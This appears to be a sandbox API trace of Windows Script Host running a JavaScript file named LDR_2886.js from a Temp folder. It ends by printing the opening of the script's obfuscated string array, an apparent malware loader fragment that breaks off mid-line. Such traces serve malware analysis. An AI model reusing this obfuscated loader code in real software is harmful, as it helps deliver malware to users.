	[0077.171] QueryPerformanceCounter (in: lpPerformanceCount=0x19fea8 | out: lpPerformanceCount=0x19fea8*=20159713919) returned 1
	[0077.171] GetStartupInfoA (in: lpStartupInfo=0x19fec0 | out: lpStartupInfo=0x19fec0*(cb=0x68, lpReserved="", lpDesktop="Winsta0\\Default", lpTitle="C:\\Windows\\System32\\WScript.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffffffffffff, hStdOutput=0xffffffffffffffff, hStdError=0xffffffffffffffff)) 
	[0077.172] GetModuleHandleA (lpModuleName=0x0) returned 0xff540000
	[0077.172] GetModuleHandleA (lpModuleName=0x0) returned 0xff540000
	[0077.172] GetVersionExA (in: lpVersionInformation=0x19fde0*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x0, dwMinorVersion=0x1c1eb0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x19fde0*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0077.172] GetUserDefaultLCID () returned 0x409
	[0077.173] CoInitialize (pvReserved=0x0) returned 0x0
	[0077.194] GetCommandLineW () returned="\"C:\\Windows\\System32\\WScript.exe\" \"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\LDR_2886.js\" "
	[0077.194] lstrlenW (lpString="\"C:\\Windows\\System32\\WScript.exe\" \"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\LDR_2886.js\" ") returned 85
	[0077.194] ??2@YAPEAX_K@Z () returned 0x4f57b0
	[0077.194] ??2@YAPEAX_K@Z () returned 0x4f5f60
	[0077.194] GetCurrentThreadId () returned 0x8c4
	[0077.194] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fb28 | out: phkResult=0x19fb28*=0x7c) returned 0x0
	[0077.195] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fb20 | out: phkResult=0x19fb20*=0x80) returned 0x0
	[0077.195] RegQueryValueExW (in: hKey=0x80, lpValueName="IgnoreUserSettings", lpReserved=0x0, lpType=0x19ee28, lpData=0x19f230, lpcbData=0x19ee20*=0x400 | out: lpType=0x19ee28*=0x0, lpData=0x19f230*=0x67, lpcbData=0x19ee20*=0x400) returned 0x2
	[0077.195] RegQueryValueExW (in: hKey=0x7c, lpValueName="Enabled", lpReserved=0x0, lpType=0x19ee28, lpData=0x19f230, lpcbData=0x19ee20*=0x400 | out: lpType=0x19ee28*=0x0, lpData=0x19f230*=0x67, lpcbData=0x19ee20*=0x400) returned 0x2
	[0077.195] RegQueryValueExW (in: hKey=0x80, lpValueName="Enabled", lpReserved=0x0, lpType=0x19ee28, lpData=0x19f230, lpcbData=0x19ee20*=0x400 | out: lpType=0x19ee28*=0x0, lpData=0x19f230*=0x67, lpcbData=0x19ee20*=0x400) returned 0x2
	[0077.195] CoInitializeSecurity (pSecDesc=0x0, cAuthSvc=-1, asAuthSvc=0x0, pReserved1=0x0, dwAuthnLevel=0x0, dwImpLevel=0x3, pAuthList=0x0, dwCapabilities=0x0, pReserved3=0x0) returned 0x0
	[0077.678] RegCloseKey (hKey=0x80) returned 0x0
	[0077.678] RegCloseKey (hKey=0x7c) returned 0x0
	[0077.678] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x19f840 | out: phkResult=0x19f840*=0x7c) returned 0x0
	[0077.678] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x19f838 | out: phkResult=0x19f838*=0x80) returned 0x0
	[0077.678] RegQueryValueExW (in: hKey=0x80, lpValueName="IgnoreUserSettings", lpReserved=0x0, lpType=0x19eb48, lpData=0x19ef50, lpcbData=0x19eb40*=0x400 | out: lpType=0x19eb48*=0x0, lpData=0x19ef50*=0x0, lpcbData=0x19eb40*=0x400) returned 0x2
	[0077.678] RegQueryValueExW (in: hKey=0x7c, lpValueName="LogSecuritySuccesses", lpReserved=0x0, lpType=0x19eb48, lpData=0x19ef50, lpcbData=0x19eb40*=0x400 | out: lpType=0x19eb48*=0x0, lpData=0x19ef50*=0x0, lpcbData=0x19eb40*=0x400) returned 0x2
	[0077.678] RegQueryValueExW (in: hKey=0x80, lpValueName="LogSecuritySuccesses", lpReserved=0x0, lpType=0x19eb48, lpData=0x19ef50, lpcbData=0x19eb40*=0x400 | out: lpType=0x19eb48*=0x0, lpData=0x19ef50*=0x0, lpcbData=0x19eb40*=0x400) returned 0x2
	[0077.678] RegCloseKey (hKey=0x80) returned 0x0
	[0077.678] RegCloseKey (hKey=0x7c) returned 0x0
	[0077.678] GetACP () returned 0x4e4
	[0077.678] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x77040000
	[0077.679] GetProcAddress (hModule=0x77040000, lpProcName="HeapSetInformation") returned 0x7705c4a0
	[0077.679] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1
	[0077.679] FreeLibrary (hLibModule=0x77040000) returned 1
	[0077.679] ??2@YAPEAX_K@Z () returned 0x4f5f80
	[0077.679] CoRegisterMessageFilter (in: lpMessageFilter=0x4f5f80, lplpMessageFilter=0x4f5f90 | out: lplpMessageFilter=0x4f5f90*=0x0) returned 0x0
	[0077.680] GetModuleFileNameW (in: hModule=0xff540000, lpFilename=0x19fb80, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\WScript.exe" (normalized: "c:\\windows\\system32\\wscript.exe")) returned 0x1f
	[0077.680] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\System32\\WScript.exe", lpdwHandle=0x19f4d0 | out: lpdwHandle=0x19f4d0) returned 0x704
	[0077.680] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\System32\\WScript.exe", dwHandle=0x0, dwLen=0x704, lpData=0x19edc0 | out: lpData=0x19edc0) returned 1
	[0077.680] VerQueryValueW (in: pBlock=0x19edc0, lpSubBlock="\\", lplpBuffer=0x19f4d8, puLen=0x19f4d4 | out: lplpBuffer=0x19f4d8*=0x19ede8, puLen=0x19f4d4) returned 1
	[0077.680] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x19f528 | out: phkResult=0x19f528*=0x7c) returned 0x0
	[0077.680] RegQueryValueExW (in: hKey=0x7c, lpValueName="IgnoreUserSettings", lpReserved=0x0, lpType=0x19e878, lpData=0x19ec80, lpcbData=0x19e870*=0x400 | out: lpType=0x19e878*=0x0, lpData=0x19ec80*=0x0, lpcbData=0x19e870*=0x400) returned 0x2
	[0077.680] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x19f4e0 | out: phkResult=0x19f4e0*=0x80) returned 0x0
	[0077.680] RegQueryValueExW (in: hKey=0x80, lpValueName="TrustPolicy", lpReserved=0x0, lpType=0x19f4a4, lpData=0x19f520, lpcbData=0x19f4a0*=0x4 | out: lpType=0x19f4a4*=0x0, lpData=0x19f520*=0x50, lpcbData=0x19f4a0*=0x4) returned 0x2
	[0077.680] RegQueryValueExW (in: hKey=0x80, lpValueName="UseWINSAFER", lpReserved=0x0, lpType=0x19e878, lpData=0x19ec80, lpcbData=0x19e870*=0x400 | out: lpType=0x19e878*=0x0, lpData=0x19ec80*=0x0, lpcbData=0x19e870*=0x400) returned 0x2
	[0077.681] RegQueryValueExW (in: hKey=0x7c, lpValueName="TrustPolicy", lpReserved=0x0, lpType=0x19f4a4, lpData=0x19f520, lpcbData=0x19f4a0*=0x4 | out: lpType=0x19f4a4*=0x0, lpData=0x19f520*=0x50, lpcbData=0x19f4a0*=0x4) returned 0x2
	[0077.681] RegQueryValueExW (in: hKey=0x7c, lpValueName="UseWINSAFER", lpReserved=0x0, lpType=0x19e878, lpData=0x19ec80, lpcbData=0x19e870*=0x400 | out: lpType=0x19e878*=0x1, lpData="1", lpcbData=0x19e870*=0x4) returned 0x0
	[0077.681] lstrlenW (lpString="1") returned 1
	[0077.681] lstrlenW (lpString="0") returned 1
	[0077.681] lstrlenW (lpString="1") returned 1
	[0077.681] lstrlenW (lpString="no") returned 2
	[0077.681] lstrlenW (lpString="1") returned 1
	[0077.681] lstrlenW (lpString="false") returned 5
	[0077.681] RegCloseKey (hKey=0x80) returned 0x0
	[0077.681] RegCloseKey (hKey=0x7c) returned 0x0
	[0077.681] RegCreateKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x20019, lpSecurityAttributes=0x0, phkResult=0x19f528, lpdwDisposition=0x0 | out: phkResult=0x19f528*=0x7c, lpdwDisposition=0x0) returned 0x0
	[0077.681] RegQueryValueExW (in: hKey=0x7c, lpValueName="Timeout", lpReserved=0x0, lpType=0x19f4c4, lpData=0x19f520, lpcbData=0x19f4c0*=0x4 | out: lpType=0x19f4c4*=0x0, lpData=0x19f520*=0x50, lpcbData=0x19f4c0*=0x4) returned 0x2
	[0077.681] RegQueryValueExW (in: hKey=0x7c, lpValueName="DisplayLogo", lpReserved=0x0, lpType=0x19e898, lpData=0x19eca0, lpcbData=0x19e890*=0x400 | out: lpType=0x19e898*=0x1, lpData="1", lpcbData=0x19e890*=0x4) returned 0x0
	[0077.681] lstrlenW (lpString="1") returned 1
	[0077.681] lstrlenW (lpString="0") returned 1
	[0077.681] lstrlenW (lpString="1") returned 1
	[0077.681] lstrlenW (lpString="no") returned 2
	[0077.681] lstrlenW (lpString="1") returned 1
	[0077.681] lstrlenW (lpString="false") returned 5
	[0077.681] RegCloseKey (hKey=0x7c) returned 0x0
	[0077.681] RegCreateKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x20019, lpSecurityAttributes=0x0, phkResult=0x19f528, lpdwDisposition=0x0 | out: phkResult=0x19f528*=0x7c, lpdwDisposition=0x0) returned 0x0
	[0077.681] RegQueryValueExW (in: hKey=0x7c, lpValueName="Timeout", lpReserved=0x0, lpType=0x19f4c4, lpData=0x19f520, lpcbData=0x19f4c0*=0x4 | out: lpType=0x19f4c4*=0x0, lpData=0x19f520*=0x50, lpcbData=0x19f4c0*=0x4) returned 0x2
	[0077.681] RegQueryValueExW (in: hKey=0x7c, lpValueName="DisplayLogo", lpReserved=0x0, lpType=0x19e898, lpData=0x19eca0, lpcbData=0x19e890*=0x400 | out: lpType=0x19e898*=0x0, lpData=0x19eca0*=0x31, lpcbData=0x19e890*=0x400) returned 0x2
	[0077.681] RegCloseKey (hKey=0x7c) returned 0x0
	[0077.682] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\LDR_2886.js") returned 48
	[0077.682] lstrlenW (lpString="js") returned 2
	[0077.682] lstrlenW (lpString="WSH") returned 3
	[0077.682] ??2@YAPEAX_K@Z () returned 0x4f5870
	[0077.682] LoadStringW (in: hInstance=0xff540000, uID=0x9c5, lpBuffer=0x19df90, cchBufferMax=2048 | out: lpBuffer="Windows Script Host") returned 0x13
	[0077.682] LoadTypeLib (in: szFile="C:\\Windows\\System32\\WScript.exe", pptlib=0x19efd0*=0x0 | out: pptlib=0x19efd0*=0x1ed100) returned 0x0
	[0077.687] ITypeLib:GetTypeInfoOfGuid (in: This=0x1ed100, GUID=0xff5458f0, ppTInfo=0x19efb8 | out: ppTInfo=0x19efb8*=0x1ee4e8) returned 0x0
	[0077.689] ITypeInfo:GetRefTypeOfImplType (in: This=0x1ee4e8, index=0xffffffff, pRefType=0x19efb0 | out: pRefType=0x19efb0*=0xfffffffe) returned 0x0
	[0077.689] ITypeInfo:GetRefTypeInfo (in: This=0x1ee4e8, hreftype=0xfffffffe, ppTInfo=0xff55f458 | out: ppTInfo=0xff55f458*=0x1ee540) returned 0x0
	[0077.689] IUnknown:Release (This=0x1ee4e8) returned 0x1
	[0077.689] ??2@YAPEAX_K@Z () returned 0x4f5900
	[0077.689] ??2@YAPEAX_K@Z () returned 0x4f59a0
	[0077.689] ??2@YAPEAX_K@Z () returned 0x4f5a00
	[0077.689] ITypeLib:GetTypeInfoOfGuid (in: This=0x1ed100, GUID=0xff545950, ppTInfo=0x19efb8 | out: ppTInfo=0x19efb8*=0x1ee598) returned 0x0
	[0077.689] ITypeInfo:GetRefTypeOfImplType (in: This=0x1ee598, index=0xffffffff, pRefType=0x19efb0 | out: pRefType=0x19efb0*=0xfffffffe) returned 0x0
	[0077.689] ITypeInfo:GetRefTypeInfo (in: This=0x1ee598, hreftype=0xfffffffe, ppTInfo=0xff55f4d8 | out: ppTInfo=0xff55f4d8*=0x1ee5f0) returned 0x0
	[0077.689] IUnknown:Release (This=0x1ee598) returned 0x1
	[0077.689] ITypeLib:GetTypeInfoOfGuid (in: This=0x1ed100, GUID=0xff545960, ppTInfo=0x19efb8 | out: ppTInfo=0x19efb8*=0x1ee648) returned 0x0
	[0077.689] ITypeInfo:GetRefTypeOfImplType (in: This=0x1ee648, index=0xffffffff, pRefType=0x19efb0 | out: pRefType=0x19efb0*=0xfffffffe) returned 0x0
	[0077.689] ITypeInfo:GetRefTypeInfo (in: This=0x1ee648, hreftype=0xfffffffe, ppTInfo=0xff55f518 | out: ppTInfo=0xff55f518*=0x1ee6a0) returned 0x0
	[0077.689] IUnknown:Release (This=0x1ee648) returned 0x1
	[0077.689] ITypeLib:GetTypeInfoOfGuid (in: This=0x1ed100, GUID=0xff545910, ppTInfo=0x19efb8 | out: ppTInfo=0x19efb8*=0x1ee6f8) returned 0x0
	[0077.689] ITypeInfo:GetRefTypeOfImplType (in: This=0x1ee6f8, index=0xffffffff, pRefType=0x19efb0 | out: pRefType=0x19efb0*=0xfffffffe) returned 0x0
	[0077.689] ITypeInfo:GetRefTypeInfo (in: This=0x1ee6f8, hreftype=0xfffffffe, ppTInfo=0xff55f498 | out: ppTInfo=0xff55f498*=0x1ee750) returned 0x0
	[0077.689] IUnknown:Release (This=0x1ee6f8) returned 0x1
	[0077.689] IUnknown:Release (This=0x1ed100) returned 0x4
	[0077.690] ??2@YAPEAX_K@Z () returned 0x4f5a60
	[0077.690] GetCurrentThreadId () returned 0x8c4
	[0077.690] CreateEventA (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0xcc
	[0077.690] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xff551cf8, lpParameter=0x4f5a60, dwCreationFlags=0x0, lpThreadId=0x4f5a88 | out: lpThreadId=0x4f5a88*=0x614) returned 0xd4
	[0077.691] MsgWaitForMultipleObjects (nCount=0x1, pHandles=0x19f210*=0xcc, fWaitAll=0, dwMilliseconds=0xffffffff, dwWakeMask=0xff) returned 0x0
	[0077.896] CloseHandle (hObject=0xcc) returned 1
	[0077.897] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\LDR_2886.js", nBufferLength=0x104, lpBuffer=0x19f2a0, lpFilePart=0x19f290 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\LDR_2886.js", lpFilePart=0x19f290*="LDR_2886.js") returned 0x30
	[0077.897] RegOpenKeyExW (in: hKey=0xffffffff80000000, lpSubKey=".js", ulOptions=0x0, samDesired=0x20019, phkResult=0x19e7b0 | out: phkResult=0x19e7b0*=0xe6) returned 0x0
	[0077.897] RegQueryValueExW (in: hKey=0xe6, lpValueName=0x0, lpReserved=0x0, lpType=0x19e760, lpData=0x19e7c0, lpcbData=0x19e764*=0x800 | out: lpType=0x19e760*=0x1, lpData="JSFile", lpcbData=0x19e764*=0xe) returned 0x0
	[0077.897] RegCloseKey (hKey=0xe6) returned 0x0
	[0077.897] RegOpenKeyExW (in: hKey=0xffffffff80000000, lpSubKey="JSFile\\ScriptEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x19e7b0 | out: phkResult=0x19e7b0*=0xe6) returned 0x0
	[0077.897] RegQueryValueExW (in: hKey=0xe6, lpValueName=0x0, lpReserved=0x0, lpType=0x19e760, lpData=0x19f030, lpcbData=0x19e764*=0x200 | out: lpType=0x19e760*=0x1, lpData="JScript", lpcbData=0x19e764*=0x10) returned 0x0
	[0077.897] RegCloseKey (hKey=0xe6) returned 0x0
	[0077.898] ??2@YAPEAX_K@Z () returned 0x4f63a0
	[0077.898] GetProcessHeap () returned 0x1c0000
	[0077.898] RtlAllocateHeap (HeapHandle=0x1c0000, Flags=0x0, Size=0x2000) returned 0x1f8430
	[0077.898] CLSIDFromString (in: lpsz="JScript", pclsid=0x19efa8 | out: pclsid=0x19efa8*(Data1=0xf414c260, Data2=0x6ac0, Data3=0x11cf, Data4=([0]=0xb6, [1]=0xd1, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbb, [6]=0xbb, [7]=0x58))) returned 0x0
	[0077.898] CoCreateInstance (rclsid=0x19efa8*(Data1=0xf414c260, Data2=0x6ac0, Data3=0x11cf, Data4=([0]=0xb6, [1]=0xd1, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbb, [6]=0xbb, [7]=0x58)), pUnkOuter=0x0, dwClsContext=0x17, riid=0xff541800*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x19efa0) 
	[0077.906] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x19d1a0 | out: lpSystemTimeAsFileTime=0x19d1a0*(dwLowDateTime=0xa6d63e30, dwHighDateTime=0x1d543d1)) 
	[0077.906] GetCurrentProcessId () returned 0x8c0
	[0077.906] GetCurrentThreadId () returned 0x8c4
	[0077.906] GetTickCount () returned 0x2428b
	[0077.906] QueryPerformanceCounter (in: lpPerformanceCount=0x19d1a8 | out: lpPerformanceCount=0x19d1a8*=20233210442) returned 1
	[0077.906] malloc (_Size=0x100) returned 0x4f6670
	[0077.907] __dllonexit () returned 0x7fedf500728
	[0077.907] __dllonexit () returned 0x7fedf500780
	[0077.907] __dllonexit () returned 0x7fedf500750
	[0077.907] __dllonexit () returned 0x7fedf5007b0
	[0077.907] LoadLibraryExA (lpLibFileName="ADVAPI32.dll", hFile=0x0, dwFlags=0x0) returned 0x7fefd710000
	[0077.907] GetProcAddress (hModule=0x7fefd710000, lpProcName="RegisterTraceGuidsA") returned 0x7717f570
	[0077.907] EtwRegisterTraceGuidsA () returned 0x0
	[0077.907] EtwRegisterTraceGuidsA () returned 0x0
	[0077.908] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x19cd90, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\WScript.exe" (normalized: "c:\\windows\\system32\\wscript.exe")) returned 0x1f
	[0077.908] GetProcAddress (hModule=0x7fefd710000, lpProcName="RegOpenKeyExA") returned 0x7fefd72b5f0
	[0077.908] RegOpenKeyExA (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows Script\\Features", ulOptions=0x0, samDesired=0x1, phkResult=0x19cef8 | out: phkResult=0x19cef8*=0x0) returned 0x2
	[0077.914] RegQueryValueExA (in: hKey=0x104, lpValueName="COM+Enabled", lpReserved=0x0, lpType=0x19eed0, lpData=0x19eec8, lpcbData=0x19eec0*=0x4 | out: lpType=0x19eed0*=0x4, lpData=0x19eec8*=0x1, lpcbData=0x19eec0*=0x4) returned 0x0
	[0077.914] GetProcAddress (hModule=0x7fefd710000, lpProcName="RegCloseKey") returned 0x7fefd730710
	[0077.914] RegCloseKey (hKey=0x104) returned 0x0
	[0077.914] GetModuleHandleA (lpModuleName="ole32.dll") returned 0x7fefea30000
	[0077.914] GetProcAddress (hModule=0x7fefea30000, lpProcName="CoGetObjectContext") returned 0x7fefea4c920
	[0077.915] LoadLibraryExA (lpLibFileName="ole32.dll", hFile=0x0, dwFlags=0x0) returned 0x7fefea30000
	[0077.915] GetProcAddress (hModule=0x7fefea30000, lpProcName="CoCreateInstance") returned 0x7fefea57490
	[0077.915] CoCreateInstance (in: rclsid=0x7fedf56cba0*(Data1=0x323, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x7fedf56cd80*(Data1=0x146, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x19eea0 | out: ppv=0x19eea0*=0x7fefec0a1b0) returned 0x0
	[0077.916] ??2@YAPEAX_K@Z () returned 0x4f6b30
	[0077.916] ??2@YAPEAX_KHPEBDH@Z () returned 0x4f5af0
	[0077.916] ??2@YAPEAX_K@Z () returned 0x4f6bf0
	[0077.916] ??2@YAPEAX_K@Z () returned 0x4f6c50
	[0077.917] ??2@YAPEAX_K@Z () returned 0x4f7140
	[0077.917] GetEnvironmentVariableW (in: lpName="JS_PROFILER", lpBuffer=0x19ee60, nSize=0x27 | out: lpBuffer="") returned 0x0
	[0077.917] GetUserDefaultLCID () returned 0x409
	[0077.917] IsValidLocale (Locale=0x409, dwFlags=0x1) returned 1
	[0077.917] GetLocaleInfoA (in: Locale=0x409, LCType=0x1004, lpLCData=0x19ef00, cchData=6 | out: lpLCData="1252") returned 5
	[0077.917] IsValidCodePage (CodePage=0x4e4) returned 1
	[0077.917] CoCreateInstance (in: rclsid=0x7fedf565d88*(Data1=0x6c736db1, Data2=0xbd94, Data3=0x11d0, Data4=([0]=0x8a, [1]=0x23, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xb5, [6]=0x8e, [7]=0x10)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x7fedf565d98*(Data1=0x6c736dc1, Data2=0xab0d, Data3=0x11d0, Data4=([0]=0xa2, [1]=0xad, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xf, [6]=0x27, [7]=0xe8)), ppv=0x4f6af0 | out: ppv=0x4f6af0*=0x1f75b0) returned 0x0
	[0077.917] IUnknown:AddRef (This=0x1f75b0) returned 0x2
	[0077.917] GetCurrentProcessId () returned 0x8c0
	[0077.917] GetCurrentThreadId () returned 0x8c4
	[0077.917] GetTickCount () returned 0x2429a
	[0077.917] ISystemDebugEventFire:BeginSession (This=0x1f75b0, guidSourceID=0x7fedf565da8, strSessionName="JScript:00002240:00002244:18148122") returned 0x0
	[0077.917] GetCurrentThreadId () returned 0x8c4
	[0077.917] ??2@YAPEAX_K@Z () returned 0x4f71e0
	[0077.917] ??2@YAPEAX_K@Z () returned 0x4f7230
	[0077.917] malloc (_Size=0x80) returned 0x4f72e0
	[0077.917] malloc (_Size=0x108) returned 0x4f7370
	[0077.918] GetTickCount () returned 0x2429a
	[0077.918] GetCurrentThreadId () returned 0x8c4
	[0077.918] ??2@YAPEAX_K@Z () returned 0x4f7480
	[0077.918] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\LDR_2886.js" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\temp\\ldr_2886.js"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000000, hTemplateFile=0x0) returned 0x110
	[0077.918] GetFileSize (in: hFile=0x110, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x4b68
	[0077.918] CreateFileMappingA (hFile=0x110, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x4b68, lpName=0x0) returned 0x114
	[0077.918] MapViewOfFile (hFileMappingObject=0x114, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x1a0000
	[0077.918] GetVersionExA (in: lpVersionInformation=0x19f0b0*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x0, dwMinorVersion=0xfd343301, dwBuildNumber=0x7fe, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x19f0b0*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0077.918] IsTextUnicode (in: lpv=0x1a0000, iSize=19304, lpiResult=0x19f0a0 | out: lpiResult=0x19f0a0) returned 0
	[0077.918] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1a0000, cbMultiByte=19304, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 19304
	[0077.919] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1a0000, cbMultiByte=19304, lpWideCharStr=0x1ff978, cchWideChar=19304 | out: lpWideCharStr="var dogoswoisosfhsdiefgssqda=['wqtowqjClg==','w5Mcwr/DvcOsK2cuBQ==','wrvDpsOqD8KNwpbCjh8pasKgV8Ozb1xZw7jDu8OwwrtSXDnDgMOwa0XCr8OAw69Dw79yA8OW','w5/Cn8KKbMK5HsOefsOg','MErCsEPDhcKacRHCmA==','wozDhsKiwrPDl8KxFAY=','woHDt2ZcPMOsGXtZQcOIwrnDj1lVNsOURHfDgl0kw4tDw4RSw7HCn8Omw5JpXDotC8O7eMKVwpxeYw==','wrDCpsOTwqBiwqfDjELCj27CoETDmHnDnxhqw5fClMKJGsOzwoPCqcOYQm1XW3sBCsOEPcKfZiU7EzrDuMODwp7Cp8OaKMOHw4wDVD5ZfMONfsO/w5c/wq5Ww7jChcOTwrNeIGbDs8KrPVvDqyEjOsKmKDxiwp5aw7jCtgTDuxxXacO3OHJsVk5XwozDvzrCpg==','wqprwqgaw4jCih0=','wofDo8KZwpvDq8KMYn/ConzDt8Kyw6xiQsOIE8OWwrFHPsO3w4PCiEHCk8K3wq7Cn1g=','wozDkcKcwozCmMO4Ew3CojHCnQ==','w7JGw6XCpS4=','w49sw43DuMKR','wrVrwr05w4o=','w4QQwpzCqMK9','wqrDu8OaCsOw','AHliEUE=','UxoSMTA=','UhQDDwg=','cwtkccKr','w79Mw6/DjsKfwqnCi8OTw5FhG8OgFnpkJA==','wowhFljClA==','csO8AMOuZA==','bhADAg==','woTCr8Owwr1N','TErDmMK6wos=','NAbDsMOpNw==','wq7DmsKJw4Z5','wqvCvEbCoks=','w5DDszthPQ==','wrDDgcKlZsKz','wqnDjsKVXcK9','wrrCs8KEDcOY','WcKzfsKnfA==','QTp1VsKB','wqrDicOVbsKL','enXCv8K7','w64uwqc2w4Y=','HnBCBg==','wqYCYQYf','XFbDmMKnwoDCi8Kew6/DpmjCrg==','wo1iUsO9Pw==','w7zDgcOjP8Kt','Rg11bsKR','w5pBwqUBwo8=','O2XCk8O/w6A=','woXCk8OZwrZq','wrvCu8Owwot+','wq5owo0pw64=','ZsOmG8OlTw==','e8OPwq4qMQ==','YhZ3d8Ki','w4BbwpvCt8OY','w7o+woQsw4s=','wojDosO+LcOW','ZH7DvC/DlQ==','c3dOwozChQ==','woVCZsOBPw==','TQxZW8Kn','PRTDssOyFw==','wpcDwpvDmsOo','RlTDuMKywqA=','NsKlecK7w7Q=','YMO/EsOldg==','w55Qw7nDosKj','w5DDmcOseDvDjsKhw4jChX0cVA3DkW/CqMKTw5QLXMOHcMKowrrCux1bwqoBRsKPw79aAGMbw6B4ZTLCrMKKBsKVwq7DglMRK8KRHjTCuMK8w514JxRiwr3DgcKX','wrXClsKBHMOa','wofDu8OVNsOZ','wqXCksOSwoU=','w61Jw6zCsCs=','XMOwOcOz','w6fCq8OoGWE=','LFYlKX0=','wobCgcKOw6ck','w7NpwpfCksOK','GUTCrcOhw7k=','HMOuwqLCn18=','w51Lw7zCoyo=','woZ5TMO8HA==','wqIMDH3Cr8KFQyNUwq8w','w5zDt2Mxwqc=','CMKwDcOTw4w=','I1NBHlA=','w4ljw6XCpzE=','wp8zwqLDkMOy','wqLCh8ONwph/','w7/DmMOLMA==','wqDDnMO6ZcKf','w4V4wp4RwoweF8OtH110dE4=','wp7DoMO6PsOVw5ZJFsOQbMKJCELCow==','DEvCrcOWw6hQwq4jKMOWHwrCqMK+w7J1wqPDhyk=','wpAMI0DCkw==','w7DDuH0rwr8=','OSrDhsOAOcKVQsKIXFXDpsOIwrYRwo0y','wpfCvMOQwotA','wqXCi1rCgm0=','d37CtMK6','F3JpGko=','wpfCnsKzOsO2','Gn9GHWs=','WlXDnsKKwok=','P8OnwrPDp8K6','XQxsS8KX','w4BBw5LDmsKj','LMOVwqvClsOq','wqHChUHCrmc=','dnfCl8KKw4s=','wrzDi8KEw75j','w5ELwpUqw5E=','HGLCv8O5w4M=','O8OCwpfCs0s=','w59uw6rDmMK/','NsOTwonCnms=','OcOrwqvCvV4=','VUHDj8KFwrE=','w6PDssO3KsKg','VcKqXMKseA==','K